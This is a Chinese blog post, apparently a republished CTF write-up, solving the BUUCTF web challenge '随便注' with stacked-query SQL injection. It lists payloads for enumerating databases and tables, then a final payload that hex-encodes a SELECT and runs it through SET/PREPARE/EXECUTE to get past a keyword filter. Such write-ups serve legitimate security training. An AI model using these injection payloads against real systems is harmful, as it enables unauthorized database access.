首页 > Web开发 > 详细

buuctf刷题之旅—web—随便注

时间:2020-02-23 19:15:15      阅读:67      评论:0      收藏:0      [点我收藏+]

打开环境

技术分享图片

 

 

 根据提示应该是sql注入

技术分享图片

 

 

 查看数据库名,和数据表

1‘;show databases;#

技术分享图片

 

 

 1‘;show tables;#

技术分享图片

 

 

 查看表内字段(1‘;desc `1919810931114514`;#)

技术分享图片

 

 

 发现关键字flag,进行查询

经过注入发现存在过滤

技术分享图片

 

在注入过程中发现如下代码

技术分享图片

 

 

 

于是利用set与prepare组合,利用16进制绕过select绕过验证

16进制(select * from 1919810931114514`),

技术分享图片

 

 

 构造payload如下

1;SeT@a=0x73656C656374202A2066726F6D20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

技术分享图片

 

 成功拿到flag

 

buuctf刷题之旅—web—随便注

原文:https://www.cnblogs.com/anweilx/p/12353174.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!